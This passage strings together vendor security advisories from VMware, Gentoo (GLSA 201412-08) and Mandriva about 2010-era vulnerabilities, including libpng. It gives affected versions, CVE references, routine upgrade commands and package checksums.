2.7.2 build 301548 or later\n AMS any Linux affected, patch pending *\n\n Server any any not affected\n\n Fusion any Mac OS/X not affected\n\n ESXi any ESXi not affected\n\n ESX any ESX not affected\n\n * Note CVE-2010-0425 is not applicable to AMS running on Linux\n\n4. Solution\n Please review the patch/release notes for your product and version\n and verify the md5sum and/or the sha1sum of your downloaded file. \n\n VMware Workstation 7.1.2\n ------------------------\n http://www.vmware.com/download/ws/\n Release notes:\n http://downloads.vmware.com/support/ws71/doc/releasenotes_ws712.html\n\n Workstation for Windows 32-bit and 64-bit with VMware Tools\t\n md5sum: 2e9715ec297dc3ca904ad2707d3e2614\n sha1sum: 55b2b99f67c3dacd402fb9880999086efd264e7a\n\n Workstation for Windows 32-bit and 64-bit without VMware Tools\t\n md5sum: 066929f59aef46f11f4d9fd6c6b36e4d\n sha1sum: def776a28ee1a21b1ad26e836ae868551fff6fc3\n\n VMware Player 3.1.2\n -------------------\n http://www.vmware.com/download/player/\n Release notes:\n\nhttp://downloads.vmware.com/support/player31/doc/releasenotes_player312.html\n\n VMware Player for Windows 32-bit and 64-bit\t\n md5sum: 3f289cb33af5e425c92d8512fb22a7ba\n sha1sum: bf67240c1f410ebeb8dcb4f6d7371334bf9a6b70\n\n VMware Player for Linux 32-bit\t\n md5sum: 11e3e3e8753e1d9abbbb92c4e3c1dfe8\n sha1sum: dd1dbcdb1f4654eefc11472b68934dcb69842749\n\n VMware Player for Linux 64-bit\t\n md5sum: 2ab08e0d4050719845a64d334ca15bb1\n sha1sum: f024ad84ec831fce8667dfa9601851da5d9fa59c\n\n VMware ACE Management Server 2.7.2\n ----------------------------------\n http://downloads.vmware.com/d/info/desktop_downloads/vmware_ace/2_7\n Release notes:\n http://downloads.vmware.com/support/ace27/doc/releasenotes_ace272.html\n\n ACE Management Server for Windows\t\n md5sum: 02f0072b8e48a98ed914b633f070d550\n sha1sum: 94a68eac4a328d21a741879b9d063227c0dc1ce4\n\n5. References\n\n CVE numbers\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3277\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2249\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0434\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0425\n\n- ------------------------------------------------------------------------\n\n6. Change log\n\n2010-09-23 VMSA-2010-0014\nInitial security advisory after release of Workstation 7.1.2,\nPlayer 3.1.2 and ACE Management Server 2.7.2 on 2010-09-23\n\n- -----------------------------------------------------------------------\n7. Contact\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n * security-announce at lists.vmware.com\n * bugtraq at securityfocus.com\n * full-disclosure at lists.grok.org.uk\n\nE-mail: security at vmware.com\nPGP key at: http://kb.vmware.com/kb/1055\n\nVMware Security Center\nhttp://www.vmware.com/security\n\nVMware Security Advisories\nhttp://www.vmware.com/security/advisoiries\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/eos_vi.html\n\nCopyright 2010 VMware Inc. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (MingW32)\n\niEYEARECAAYFAkycSrQACgkQS2KysvBH1xmT9wCfbBUS4GYrJohz+QMLYcoiFmSh\neTgAoIAmx+ilbe2myj02daLjFrVQfQII\n=5jlh\n-----END PGP SIGNATURE-----\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201412-08\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: Multiple packages, Multiple vulnerabilities fixed in 2010\n Date: December 11, 2014\n Bugs: #159556, #208464, #253822, #259968, #298067, #300375,\n #300943, #302478, #307525, #307633, #315235, #316697,\n #319719, #320961, #322457, #325507, #326759, #326953,\n #329125, #329939, #331421, #332527, #333661\n ID: 201412-08\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nThis GLSA contains notification of vulnerabilities found in several\nGentoo packages which have been fixed prior to January 1, 2011. Please see the package list and CVE\nidentifiers below for more information. \n\nBackground\n==========\n\nFor more information on the packages listed in this GLSA, please see\ntheir homepage referenced in the ebuild. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-util/insight \u003c 6.7.1-r1 \u003e= 6.7.1-r1\n 2 dev-perl/perl-tk \u003c 804.028-r2 \u003e= 804.028-r2\n 3 dev-util/sourcenav \u003c 5.1.4 \u003e= 5.1.4\n 4 dev-lang/tk \u003c 8.4.18-r1 \u003e= 8.4.18-r1\n 5 sys-block/partimage \u003c 0.6.8 \u003e= 0.6.8\n 6 app-antivirus/bitdefender-console\n \u003c= 7.1 Vulnerable!\n 7 net-mail/mlmmj \u003c 1.2.17.1 \u003e= 1.2.17.1\n 8 sys-apps/acl \u003c 2.2.49 \u003e= 2.2.49\n 9 x11-apps/xinit \u003c 1.2.0-r4 \u003e= 1.2.0-r4\n 10 app-arch/gzip \u003c 1.4 \u003e= 1.4\n 11 app-arch/ncompress \u003c 4.2.4.3 \u003e= 4.2.4.3\n 12 dev-libs/liblzw \u003c 0.2 \u003e= 0.2\n 13 media-gfx/splashutils \u003c 1.5.4.3-r3 \u003e= 1.5.4.3-r3\n 14 sys-devel/m4 \u003c 1.4.14-r1 \u003e= 1.4.14-r1\n 15 kde-base/kdm \u003c 4.3.5-r1 \u003e= 4.3.5-r1\n 16 x11-libs/gtk+ \u003c 2.18.7 \u003e= 2.18.7\n 17 kde-base/kget \u003c 4.3.5-r1 \u003e= 4.3.5-r1\n 18 app-text/dvipng \u003c 1.13 \u003e= 1.13\n 19 app-misc/beanstalkd \u003c 1.4.6 \u003e= 1.4.6\n 20 sys-apps/pmount \u003c 0.9.23 \u003e= 0.9.23\n 21 sys-auth/pam_krb5 \u003c 4.3 \u003e= 4.3\n 22 app-text/gv \u003c 3.7.1 \u003e= 3.7.1\n 23 net-ftp/lftp \u003c 4.0.6 \u003e= 4.0.6\n 24 www-client/uzbl \u003c 2010.08.05 \u003e= 2010.08.05\n 25 x11-misc/slim \u003c 1.3.2 \u003e= 1.3.2\n 26 net-misc/iputils \u003c 20100418 \u003e= 20100418\n 27 media-tv/dvbstreamer \u003c 1.1-r1 \u003e= 1.1-r1\n -------------------------------------------------------------------\n NOTE: Certain packages are still vulnerable. Users should migrate\n to another package if one is available or wait for the\n existing packages to be marked stable by their\n architecture maintainers. \n -------------------------------------------------------------------\n 27 affected packages\n\nDescription\n===========\n\nVulnerabilities have been discovered in the packages listed below. \nPlease review the CVE identifiers in the Reference section for details. \n\n* Insight\n* Perl Tk Module\n* Source-Navigator\n* Tk\n* Partimage\n* Mlmmj\n* acl\n* Xinit\n* gzip\n* ncompress\n* liblzw\n* splashutils\n* GNU M4\n* KDE Display Manager\n* GTK+\n* KGet\n* dvipng\n* Beanstalk\n* Policy Mount\n* pam_krb5\n* GNU gv\n* LFTP\n* Uzbl\n* Slim\n* Bitdefender Console\n* iputils\n* DVBStreamer\n\nImpact\n======\n\nA context-dependent attacker may be able to gain escalated privileges,\nexecute arbitrary code, cause Denial of Service, obtain sensitive\ninformation, or otherwise bypass security restrictions. \n\nWorkaround\n==========\n\nThere are no known workarounds at this time. \n\nResolution\n==========\n\nAll Insight users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-util/insight-6.7.1-r1\"\n\nAll Perl Tk Module users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-perl/perl-tk-804.028-r2\"\n\nAll Source-Navigator users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-util/sourcenav-5.1.4\"\n\nAll Tk users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-lang/tk-8.4.18-r1\"\n\nAll Partimage users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=sys-block/partimage-0.6.8\"\n\nAll Mlmmj users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-mail/mlmmj-1.2.17.1\"\n\nAll acl users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=sys-apps/acl-2.2.49\"\n\nAll Xinit users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=x11-apps/xinit-1.2.0-r4\"\n\nAll gzip users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=app-arch/gzip-1.4\"\n\nAll ncompress users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=app-arch/ncompress-4.2.4.3\"\n\nAll liblzw users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/liblzw-0.2\"\n\nAll splashutils users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=media-gfx/splashutils-1.5.4.3-r3\"\n\nAll GNU M4 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=sys-devel/m4-1.4.14-r1\"\n\nAll KDE Display Manager users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=kde-base/kdm-4.3.5-r1\"\n\nAll GTK+ users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=x11-libs/gtk+-2.18.7\"\n\nAll KGet 4.3 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=kde-base/kget-4.3.5-r1\"\n\nAll dvipng users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=app-text/dvipng-1.13\"\n\nAll Beanstalk users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=app-misc/beanstalkd-1.4.6\"\n\nAll Policy Mount users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=sys-apps/pmount-0.9.23\"\n\nAll pam_krb5 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=sys-auth/pam_krb5-4.3\"\n\nAll GNU gv users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=app-text/gv-3.7.1\"\n\nAll LFTP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-ftp/lftp-4.0.6\"\n\nAll Uzbl users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=www-client/uzbl-2010.08.05\"\n\nAll Slim users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=x11-misc/slim-1.3.2\"\n\nAll iputils users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/iputils-20100418\"\n\nAll DVBStreamer users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=media-tv/dvbstreamer-1.1-r1\"\n\nGentoo has discontinued support for Bitdefender Console. We recommend\nthat users unmerge Bitdefender Console:\n\n # emerge --unmerge \"app-antivirus/bitdefender-console\"\n\nNOTE: This is a legacy GLSA. Updates for all affected architectures\nhave been available since 2011. It is likely that your system is\nalready no longer affected by these issues. \n\nReferences\n==========\n\n[ 1 ] CVE-2006-3005\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-3005\n[ 2 ] CVE-2007-2741\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2741\n[ 3 ] CVE-2008-0553\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0553\n[ 4 ] CVE-2008-1382\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1382\n[ 5 ] CVE-2008-5907\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5907\n[ 6 ] CVE-2008-6218\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-6218\n[ 7 ] CVE-2008-6661\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-6661\n[ 8 ] CVE-2009-0040\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0040\n[ 9 ] CVE-2009-0360\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0360\n[ 10 ] CVE-2009-0361\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0361\n[ 11 ] CVE-2009-0946\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0946\n[ 12 ] CVE-2009-2042\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2042\n[ 13 ] CVE-2009-2624\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2624\n[ 14 ] CVE-2009-3736\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3736\n[ 15 ] CVE-2009-4029\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4029\n[ 16 ] CVE-2009-4411\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4411\n[ 17 ] CVE-2009-4896\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4896\n[ 18 ] CVE-2010-0001\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0001\n[ 19 ] CVE-2010-0436\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0436\n[ 20 ] CVE-2010-0732\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0732\n[ 21 ] CVE-2010-0829\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0829\n[ 22 ] CVE-2010-1000\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1000\n[ 23 ] CVE-2010-1205\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1205\n[ 24 ] CVE-2010-1511\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1511\n[ 25 ] CVE-2010-2056\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2056\n[ 26 ] CVE-2010-2060\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2060\n[ 27 ] CVE-2010-2192\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2192\n[ 28 ] CVE-2010-2251\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2251\n[ 29 ] CVE-2010-2529\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2529\n[ 30 ] CVE-2010-2809\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2809\n[ 31 ] CVE-2010-2945\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2945\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201412-08.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. \n \n As a precaution htmldoc has been rebuilt to link against the\n system libpng library for CS4 and 2008.0. Latest xulrunner and\n mozilla-thunderbird has been patched as a precaution for 2008.0 wheres\n on 2009.0 and up the the system libpng library is used instead of the\n bundled copy. \n \n Packages for 2008.0 and 2009.0 are provided as of the Extended\n Maintenance Program. Please visit this link to learn more:\n http://store.mandriva.com/product_info.php?cPath=149\u0026products_id=490\n \n The updated packages have been patched to correct these issues. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6218\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2249\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Linux 2008.0:\n 4e91a2a256c61f52dffd4fb625e20cf8 2008.0/i586/htmldoc-1.8.27-1.2mdv2008.0.i586.rpm\n 71553205b1e31d2891667d2eab7aca14 2008.0/i586/htmldoc-nogui-1.8.27-1.2mdv2008.0.i586.rpm\n 75b6d3f905d7e94154902f81e4728963 2008.0/i586/libpng3-1.2.22-0.5mdv2008.0.i586.rpm\n fa0c81f2b544f65455a0e0420d9a0e56 2008.0/i586/libpng-devel-1.2.22-0.5mdv2008.0.i586.rpm\n d4d06a12fd8ee88295877e127757c64b 2008.0/i586/libpng-source-1.2.22-0.5mdv2008.0.i586.rpm\n 6687d56f95702f0e5786c885ab79c6a9 2008.0/i586/libpng-static-devel-1.2.22-0.5mdv2008.0.i586.rpm\n 546c18ed8ccf044a45dff3a8cd5ac5b7 2008.0/i586/libxulrunner1.9.2.6-1.9.2.6-0.2mdv2008.0.i586.rpm\n b428e1202d95d588fb3248c2b2fe8b2f 2008.0/i586/libxulrunner-devel-1.9.2.6-0.2mdv2008.0.i586.rpm\n b9541da4417ea1150c493aea591509bb 2008.0/i586/mozilla-thunderbird-3.0.5-0.2mdv2008.0.i586.rpm\n 3389caeeda8b8f272d0e5ed070f075b8 2008.0/i586/mozilla-thunderbird-enigmail-3.0.5-0.2mdv2008.0.i586.rpm\n 901abb46652fbc19c8e655895181a949 2008.0/i586/nsinstall-3.0.5-0.2mdv2008.0.i586.rpm\n ad221cd523bff8f4a59037aa05e1442b 2008.0/i586/xulrunner-1.9.2.6-0.2mdv2008.0.i586.rpm \n d3dbbb58c9832db4edbc45a4023b4477 2008.0/SRPMS/htmldoc-1.8.27-1.2mdv2008.0.src.rpm\n 885dba7fe0581b37de05d20b838f279a 2008.0/SRPMS/libpng-1.2.22-0.5mdv2008.0.src.rpm\n 358c49e17d4db735f6862fdbee95a1c9 2008.0/SRPMS/mozilla-thunderbird-3.0.5-0.2mdv2008.0.src.rpm\n 748ab46a19f1c32808bf3e79429f2211 2008.0/SRPMS/xulrunner-1.9.2.6-0.2mdv2008.0.src.rpm\n\n Mandriva Linux 2008.0/X86_64:\n 8b2eff5dd89f4ed7e3f120bbc31afa34 2008.0/x86_64/htmldoc-1.8.27-1.2mdv2008.0.x86_64.rpm\n 15460a7bce68e95d03a87eb14066728b 2008.0/x86_64/htmldoc-nogui-1.8.27-1.2mdv2008.0.x86_64.rpm\n c7577072f7ab2786a97d7df732b4299a 2008.0/x86_64/lib64png3-1.2.22-0.5mdv2008.0.x86_64.rpm\n fae36a86aa019cf0fcbcf0d15c508208 2008.0/x86_64/lib64png-devel-1.2.22-0.5mdv2008.0.x86_64.rpm\n 141ec56a2395ed150acc997eac851429 2008.0/x86_64/lib64png-static-devel-1.2.22-0.5mdv2008.0.x86_64.rpm\n a29c11e39685931084a085f5716afd5c 2008.0/x86_64/lib64xulrunner1.9.2.6-1.9.2.6-0.2mdv2008.0.x86_64.rpm\n 3a846b86c758be68420ef05e44cfe717 2008.0/x86_64/lib64xulrunner-devel-1.9.2.6-0.2mdv2008.0.x86_64.rpm\n 084f3b3d7c68806c7acfc7f3be701f0b 2008.0/x86_64/libpng-source-1.2.22-0.5mdv2008.0.x86_64.rpm\n c45f7479d93714c46d14f4ae2a5b76bd 2008.0/x86_64/mozilla-thunderbird-3.0.5-0.2mdv2008.0.x86_64.rpm\n 996e7a6a98997883236b08f6ec5816fa 2008.0/x86_64/mozilla-thunderbird-enigmail-3.0.5-0.2mdv2008.0.x86_64.rpm\n ecfdba6225b837a7a03c2ddf0d77d07f 2008.0/x86_64/nsinstall-3.0.5-0.2mdv2008.0.x86_64.rpm\n 394d8e8458e503ed10db7c7b7f742c2b 2008.0/x86_64/xulrunner-1.9.2.6-0.2mdv2008.0.x86_64.rpm \n d3dbbb58c9832db4edbc45a4023b4477 2008.0/SRPMS/htmldoc-1.8.27-1.2mdv2008.0.src.rpm\n 885dba7fe0581b37de05d20b838f279a 2008.0/SRPMS/libpng-1.2.22-0.5mdv2008.0.src.rpm\n 358c49e17d4db735f6862fdbee95a1c9 2008.0/SRPMS/mozilla-thunderbird-3.0.5-0.2mdv2008.0.src.rpm\n 748ab46a19f1c32808bf3e79429f2211 2008.0/SRPMS/xulrunner-1.9.2.6-0.2mdv2008.0.src.rpm\n\n Mandriva Linux 2009.0:\n 28b355727c0ef89be1955a18a8c4a1cf 2009.0/i586/libpng3-1.2.31-2.3mdv2009.0.i586.rpm\n bf33a24dc5144d0c2362e5c7432f9434 2009.0/i586/libpng-devel-1.2.31-2.3mdv2009.0.i586.rpm\n e331263b8ac75ddad94f6d9d06d9c802 2009.0/i586/libpng-source-1.2.31-2.3mdv2009.0.i586.rpm\n 921c4ed0268fcb932f52d299ea74a28c 2009.0/i586/libpng-static-devel-1.2.31-2.3mdv2009.0.i586.rpm \n c43df36b143f834aa7351eb6a9952897 2009.0/SRPMS/libpng-1.2.31-2.3mdv2009.0.src.rpm\n\n Mandriva Linux 2009.0/X86_64:\n a20b2965684ddb18b2818d618927bb9a 2009.0/x86_64/lib64png3-1.2.31-2.3mdv2009.0.x86_64.rpm\n df3bbf6f7e959aea3f6065c83ece5321 2009.0/x86_64/lib64png-devel-1.2.31-2.3mdv2009.0.x86_64.rpm\n 3c8e3469239f93a70ccbcf56ba55cfb6 2009.0/x86_64/lib64png-static-devel-1.2.31-2.3mdv2009.0.x86_64.rpm\n 740cd4b4cf0d39dd03a26f0b821cfee4 2009.0/x86_64/libpng-source-1.2.31-2.3mdv2009.0.x86_64.rpm \n c43df36b143f834aa7351eb6a9952897 2009.0/SRPMS/libpng-1.2.31-2.3mdv2009.0.src.rpm\n\n Mandriva Linux 2009.1:\n 127a1c180703d9c89f5f968d7262c469 2009.1/i586/libpng3-1.2.35-1.2mdv2009.1.i586.rpm\n 3bbf13f800dcbb5f4ab45ffe898f96ce 2009.1/i586/libpng-devel-1.2.35-1.2mdv2009.1.i586.rpm\n 2e369ee2602705f601d23a977c82ae8a 2009.1/i586/libpng-source-1.2.35-1.2mdv2009.1.i586.rpm\n 5784917823e881a4aa997276528bfabe 2009.1/i586/libpng-static-devel-1.2.35-1.2mdv2009.1.i586.rpm \n 6267ae8a72870fdd2a44962d987a6216 2009.1/SRPMS/libpng-1.2.35-1.2mdv2009.1.src.rpm\n\n Mandriva Linux 2009.1/X86_64:\n d6032db330f8b8b40af48b29fc6d3730 2009.1/x86_64/lib64png3-1.2.35-1.2mdv2009.1.x86_64.rpm\n 4aac775bc389d382f184d912ef50b0be 2009.1/x86_64/lib64png-devel-1.2.35-1.2mdv2009.1.x86_64.rpm\n fb792b3d38cf769590a2dde6ee74c755 2009.1/x86_64/lib64png-static-devel-1.2.35-1.2mdv2009.1.x86_64.rpm\n 0dfcb358ed06fe83e9621e06189aa8f9 2009.1/x86_64/libpng-source-1.2.35-1.2mdv2009.1.x86_64.rpm \n 6267ae8a72870fdd2a44962d987a6216 2009.1/SRPMS/libpng-1.2.35-1.2mdv2009.1.src.rpm\n\n Mandriva Linux 2010.0:\n 76ba7b51c3eda624850a8288bd182afa 2010.0/i586/libpng3-1.2.40-1.2mdv2010.0.i586.rpm\n 7a936f6a94f33f0e7ffc991ff7b4ed7f 2010.0/i586/libpng-devel-1.2.40-1.2mdv2010.0.i586.rpm\n abd9ee162933e3208918d3190c76c0af 2010.0/i586/libpng-source-1.2.40-1.2mdv2010.0.i586.rpm\n bae7010f8e07568c1a9b42e20e7ddebf 2010.0/i586/libpng-static-devel-1.2.40-1.2mdv2010.0.i586.rpm \n cc04ec15436b892a4e75f1ad18675fb6 2010.0/SRPMS/libpng-1.2.40-1.2mdv2010.0.src.rpm\n\n Mandriva Linux 2010.0/X86_64:\n 499b5e2707d19becfdab415a8008b122 2010.0/x86_64/lib64png3-1.2.40-1.2mdv2010.0.x86_64.rpm\n 166ca4d21e39bbb3f250806626c59154 2010.0/x86_64/lib64png-devel-1.2.40-1.2mdv2010.0.x86_64.rpm\n 1c4b4f2e79cf01a4388a2e395dd64cfa 2010.0/x86_64/lib64png-static-devel-1.2.40-1.2mdv2010.0.x86_64.rpm\n 88b678c1352aa3ed0fffb04241254128 2010.0/x86_64/libpng-source-1.2.40-1.2mdv2010.0.x86_64.rpm \n cc04ec15436b892a4e75f1ad18675fb6 2010.0/SRPMS/libpng-1.2.40-1.2mdv2010.0.src.rpm\n\n Mandriva Linux 2010.1:\n 349ec004acb579d4466b530bfd5fbf3d 2010.1/i586/libpng3-1.2.43-1.1mdv2010.1.i586.rpm\n d9e323791b16319728fe1486f819e59b 2010.1/i586/libpng-devel-1.2.43-1.1mdv2010.1.i586.rpm\n 3101d70a79c416392fe228d34b9ba6ff 2010.1/i586/libpng-source-1.2.43-1.1mdv2010.1.i586.rpm\n 2ff75d1339d52d859939d81994eae477 2010.1/i586/libpng-static-devel-1.2.43-1.1mdv2010.1.i586.rpm \n 0638fc23b9c5f1f7b3bcd0fdaf71bea8 2010.1/SRPMS/libpng-1.2.43-1.1mdv2010.1.src.rpm\n\n Mandriva Linux 2010.1/X86_64:\n 80e4392bbe0bd06b392216a6737cd37a 2010.1/x86_64/lib64png3-1.2.43-1.1mdv2010.1.x86_64.rpm\n 2d7d50b539c63cd1874ed8150d7fb84a 2010.1/x86_64/lib64png-devel-1.2.43-1.1mdv2010.1.x86_64.rpm\n 5c3793d0bc69db028ec214a6c9f67c1e 2010.1/x86_64/lib64png-static-devel-1.2.43-1.1mdv2010.1.x86_64.rpm\n 06b83b6f5050410eff5fe8a590972c18 2010.1/x86_64/libpng-source-1.2.43-1.1mdv2010.1.x86_64.rpm \n 0638fc23b9c5f1f7b3bcd0fdaf71bea8 2010.1/SRPMS/libpng-1.2.43-1.1mdv2010.1.src.rpm\n\n Corporate 4.0:\n be322ac5f446c26c2d0983a2d37e0c6c corporate/4.0/i586/htmldoc-1.8.23-8.2.20060mlcs4.i586.rpm\n 71329303eddfd4af0994a708bbe4a119 corporate/4.0/i586/htmldoc-nogui-1.8.23-8.2.20060mlcs4.i586.rpm\n 1c1036be9452042cd356349d6251b697 corporate/4.0/i586/libpng3-1.2.8-1.8.20060mlcs4.i586.rpm\n e9ba6c0c604a08f555d99503ba7adb68 corporate/4.0/i586/libpng3-devel-1.2.8-1.8.20060mlcs4.i586.rpm\n 288d9ca48ea58918bdff316891f3c474 corporate/4.0/i586/libpng3-static-devel-1.2.8-1.8.20060mlcs4.i586.rpm \n 3aa4084dfc51cf4e8ba252f89d53b220 corporate/4.0/SRPMS/htmldoc-1.8.23-8.2.20060mlcs4.src.rpm\n b2449f493949c397ac345027783c1216 corporate/4.0/SRPMS/libpng-1.2.8-1.8.20060mlcs4.src.rpm\n\n Corporate 4.0/X86_64:\n f761706265fcbebd220b16542a742cc9 corporate/4.0/x86_64/htmldoc-1.8.23-8.2.20060mlcs4.x86_64.rpm\n 79b3189809ad9176401620a41aaa1fcd corporate/4.0/x86_64/htmldoc-nogui-1.8.23-8.2.20060mlcs4.x86_64.rpm\n e4f9ac99ff42fbc27aae3d8942903043 corporate/4.0/x86_64/lib64png3-1.2.8-1.8.20060mlcs4.x86_64.rpm\n e26042ead39ce63ed5f4700d2e61e260 corporate/4.0/x86_64/lib64png3-devel-1.2.8-1.8.20060mlcs4.x86_64.rpm\n 609d6dc1b8a2b5afb029505469844c4f corporate/4.0/x86_64/lib64png3-static-devel-1.2.8-1.8.20060mlcs4.x86_64.rpm \n 3aa4084dfc51cf4e8ba252f89d53b220 corporate/4.0/SRPMS/htmldoc-1.8.23-8.2.20060mlcs4.src.rpm\n b2449f493949c397ac345027783c1216 corporate/4.0/SRPMS/libpng-1.2.8-1.8.20060mlcs4.src.rpm\n\n Mandriva Enterprise Server 5:\n 282337fa9e11a04ef82464c7574591f4 mes5/i586/libpng3-1.2.31-2.3mdvmes5.1.i586.rpm\n 92c6ec861cf7da08a498576ba412e633 mes5/i586/libpng-devel-1.2.31-2.3mdvmes5.1.i586.rpm\n c9efa6abde763edff47bf0c1071c9f1a mes5/i586/libpng-source-1.2.31-2.3mdvmes5.1.i586.rpm\n 2f5340946610590a6baec42354868888 mes5/i586/libpng-static-devel-1.2.31-2.3mdvmes5.1.i586.rpm \n 488ece2aa6a2c4dc62d4c274d64c2926 mes5/SRPMS/libpng-1.2.31-2.3mdvmes5.1.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n e5f88951d2135de8587d4be94b405ce9 mes5/x86_64/lib64png3-1.2.31-2.3mdvmes5.1.x86_64.rpm\n 6b89da9eea105e65d7ae3c875c148473 mes5/x86_64/lib64png-devel-1.2.31-2.3mdvmes5.1.x86_64.rpm\n c1e6715410bbf2081187aef6749b0e3d mes5/x86_64/lib64png-static-devel-1.2.31-2.3mdvmes5.1.x86_64.rpm\n cb7ef533d9966c8b531cde8a661fc0af mes5/x86_64/libpng-source-1.2.31-2.3mdvmes5.1.x86_64.rpm \n 488ece2aa6a2c4dc62d4c274d64c2926 